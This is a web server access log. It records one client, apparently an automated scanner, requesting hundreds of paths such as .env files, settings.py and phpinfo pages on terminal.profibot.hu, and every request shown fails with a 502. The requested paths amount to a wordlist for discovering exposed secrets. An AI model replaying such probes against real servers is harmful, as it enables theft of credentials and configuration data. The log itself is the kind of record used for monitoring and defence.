- GET https terminal.profibot.hu "/services/traefik/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/sessions/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/settings.py" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/shared/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/shibboleth/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/shop/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/shopware/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/Simple_server/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/site-library/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/sitemaps/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/sites/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/sitestatic/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/Socketio/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/source/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/sources/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/Sources/API/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/spearmint/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/spikes/config-material-app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/SpotiApps/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/src/__tests__/__fixtures__/instanceWithDependentSteps/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/src/__tests__/__fixtures__/typeScriptIntegrationProject/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/src/__tests__/__fixtures__/typeScriptProject/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/src/__tests__/__fixtures__/typeScriptVisualizeProject/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/src/add-auth/express/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/src/assembly/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/src/character-service/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/src/client/mobile/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:33 +0000] - - 502 - GET https terminal.profibot.hu "/src/core/tests/dotenv-files/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/src/gameprovider-service/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/src/main/front-end/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/src/main/resources/archetype-resources/__rootArtifactId__-acceptance-test/src/test/resources/app-launcher-tile/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/src/renderer/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/srv6_controller/controller/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/srv6_controller/examples/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/srv6_controller/node-manager/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/st-js-be-2020-movies-two/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/stack.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/stackato-pkg/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/stag/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/staging-api/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/staging/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/staging/api/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/staging/backend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/staging/frontend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static-collected/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static-html/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static-root/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/*.chunk.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.11bc02d8.chunk.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.1b34ee2a.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.335d17a0.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.36e5ec99.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.48389ac6.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.4aa2819f.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.602cea98.chunk.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.87c766e3.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.89c971fa.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:34 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.8c18b542.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.bfa51071.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/main.ef8ecb99.chunk.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/static_prod/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/static_root/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/static_user/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/staticfiles/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/stats/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/storage/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/storage/.env.local" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/storage/debugbar/*.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/strapi/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/style/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/styles/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/stylesheets/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/swagger/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/symfony/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/system-config/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/system/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/system/config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/system/phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/target/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/temanr10/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/temanr9/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/temp.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/temp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/template/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/templates/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/test" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/test-api/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/test-network/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/test-network/addOrg3/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:35 +0000] - - 502 - GET https terminal.profibot.hu "/test/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/aries-js-worker/fixtures/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/adapter-rest/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/agent-rest/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/couchdb/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/demo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/demo/openapi/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/did-method-rest/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/did-rest/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/edv-rest/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/openapi-demo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/sidetree-mock/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/universalresolver/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/bdd/fixtures/vc-rest/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/fixtures/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/fixtures/app_types/node/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/fixtures/app_types/rails/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/fixtures/node_path/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test/integration/env-config/app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test0.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test1" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test1.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test123.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test2.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test3.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test4.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test5.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test6.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test7.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test8.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test9.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:36 +0000] - - 502 - GET https terminal.profibot.hu "/test_info.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/test_info1.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/test_info2.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/test_info3.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/test_info4.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/test_info5.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo1.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo2.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo3.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo4.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/test_phpinfo5.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/tester.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/testfiles/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/testing.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/testing/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/testing/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/testing/docker/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/tests/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/Tests/Application/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v10.0/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v11.0/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v12.0/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v13.0/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 +0000] - - 502 - GET https terminal.profibot.hu "/tests/default_settings/v7.0/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:37 